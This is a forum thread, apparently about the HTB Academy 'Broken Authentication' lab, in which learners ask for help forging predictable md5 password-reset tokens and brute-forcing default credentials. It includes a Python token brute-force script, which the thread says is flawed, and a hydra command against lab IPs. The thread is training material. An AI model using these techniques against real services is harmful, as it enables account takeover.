BROKEN AUTHENTICATION module | HTB Academy

I’m stucking “Predictable Reset Token” section !
Who can guide me to practice it, please ? Thanks

question 1: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of ±1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the “Check” button. What is the flag?

Hint: Convert the displayed date to epoch time in milliseconds and use it in the script you will create.

I know the token will be generate by “username and time” then hash by md5, like the Apache OpenMeeting bug. CVE-2016-0783
but I convert datetime to epoch time, and I’m still get wrong token !

I’m with you. I would love some help with this

I’m banging my head against the wall with this one. I need serious help. I made an md5 hash of the username + the time in epoch in miliseconds just like the hint says and it doesn’t match the displayed token. Does anyone have a hint?

Does anyone have a hint, please?

I am now at the same point. Anybody was able to progress?

I just skipped it. I tried every combo of htbstudent with every permutation of epoctime, tried switching them, tried putting a colon in between them, switching them. I wrote multiple python scripts doing random things like taking the date.date() and datetime.datetime(…).timestamp() * 1000. I can’t get it to work.

Use a python script! “now = round (time.time () * 1000)” is the right way and don’t forget the + -1 second for the htbadmin token!

I solved it! The key is to brute-force every possible timestamp within that 2 seconds

I still can’t get it. Here is my script. Where did I go wrong? #! /usr/bin/python3 import time import datetime import requests from hashlib import md5 headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Content-Type”: “application/x-www-form-urlencoded”} url = “http://46.101.14.69:30865/question1/” data = ‘submit=htbuser’ res1 = requests.post(url, headers=headers, data=data) mytime = round(time.time() * 1000) user = “htbadmin” for time in range(mytime - 1000, mytime + 1000): raw_data = user + str(time) encoded = md5(raw_data.encode()) token = encoded.hexdigest() data = “token={token}&submit=check” res = requests.post(url, data=data, headers=headers) if “Wrong token.” in res.text: print(f"checking: {time}") continue else: print(res.text) break

You have misunderstood how the token for “htbadmin” is generated. When you click on “create reset token for htbuser”, let’s say the timestamp at this moment is T, then the server generates the token for "htbadmin"using timestamp within the range of [T-1000, T+1000] Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp. PS. There is another issue within your code that could stop you find the correct token. I will leave it for you to figure out for now

Some one solve Broken Authentication Skill Assessment?

Thanks! The only problem is that the time displayed on the page is the exact same time as the header (which is why i used it). I’ll look through the rest of my code for the other problem Type your comment> @OceanicSix said: > You have misunderstood how the token for “htbadmin” is generated. > > When you click on “create reset token for htbuser”, let’s say the timestamp at this moment is T, then the server generates the token for "htbadmin"using timestamp within the range of [T-1000, T+1000] > > Therefore, you are supposed to use the time displayed on the webpage instead of the current timestamp. > > PS. There is another issue within your code that could stop you find the correct token. I will leave it for you to figure out for now

Question 1 key is not using the time printed, but converting it to your own local time

I’m stucking “Default Credentials”

question
“”"
Inspect the login page and perform a bruteforce attack. What is the valid username?
“”"

hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 46.101.23.188 -s 31420 http-post-form “/:Username=^USER^&Password=^PASS^:F=<button type=“submit””

I don’t know what the problem is.

Error List or parameter?

Does anyone give me a hint?

Thanks

“CRTL + U” to view page source, and googling the title information!